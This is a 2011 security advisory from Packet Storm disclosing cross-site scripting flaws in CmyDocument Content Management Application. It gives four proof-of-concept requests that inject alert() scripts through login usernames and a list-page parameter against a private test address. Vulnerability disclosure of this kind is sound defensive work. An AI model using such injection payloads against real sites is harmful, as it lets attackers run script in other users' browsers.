CmyDocument Content Management suffers from multiple cross site scripting vulnerabilities.
fbd18ab5a15445be1304549c1d12c945436c12dca254627f5eabe69fd9e97325Title: CmyDocument Content Management Application - XSS Vulnerabilities
Software : CmyDocument Content Management Application
Software Version : Unknown(version update : 2010-01-10)
Vendor: http://cmydocument.com/
Vulnerability Published : 2011-07-11
Vulnerability Update Time :
Status :
Impact : Medium
Bug Description :
CmyDocument Content Management Application(version update : 2010-01-10, possibly earlier versions) is vulnerable to XSS.
Proof Of Concept :
1)username in login.asp,PoC:
POST http://192.168.10.202/login.asp
------------------------------------
username="><script>alert('demonalex')</script>&password=bbb&rememberme=a&submit=+++Login+++
2)username in login2.asp,PoC:
POST http://192.168.10.202/login2.asp
------------------------------------
username="><script>alert('demonalex')</script>&password=bbb&rememberme=a&submit=+++Login+++
3)x_Revised in myDoclist.asp,PoC:
http://192.168.10.202/myDoclist.asp?x_Title=a&z_Title=LIKE&x_Revised=<SCRIPT>alert("demonalex");</SCRIPT>&z_Revised==&x_KeyWords=info&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE
4)x_Revised in myWebDoclist.asp,PoC:
http://192.168.10.202/myWebDoclist.asp?x_Title=b&z_Title=LIKE&x_Revised=<SCRIPT>alert("demonalex");</SCRIPT>&z_Revised==&x_KeyWords=test&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE
Credits : This vulnerability was discovered by demonalex(at)163(dot)com
Pentester/Researcher
Dark2S Security Team/PolyU.HK
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed